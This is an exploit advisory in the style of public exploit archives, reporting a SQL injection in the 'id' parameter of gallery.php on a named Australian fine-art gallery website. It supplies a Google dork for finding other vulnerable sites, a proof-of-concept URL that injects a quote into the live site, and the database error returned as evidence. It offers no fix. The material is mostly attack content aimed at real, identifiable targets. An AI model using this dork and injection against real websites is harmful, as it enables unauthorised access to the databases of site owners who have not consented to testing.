################################################################################## # Exploit Title : Melbourne Fineart Gallery Australia 1.0 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Date : 30/12/2018 # Vendor Homepage : melbournefineart.com.au # Tested On : Windows # Exploit Risk : Medium # Version Information : 1.0 - Apache 2.0.53 - PHP 4.3.11 # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # CXSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018050294 ################################################################################## # Google Dork : ''inurl:''/gallery.php?id='' site:com.au # Exploit : /gallery.php?id=[SQL Injection ] # Example Site => melbournefineart.com.au/gallery.php?id=18%27 [ Proof of Concept for SQL Injection ] => archive.is/heFX2 # SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by image_order limit 1' at line 1] ################################################################################## # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ##################################################################################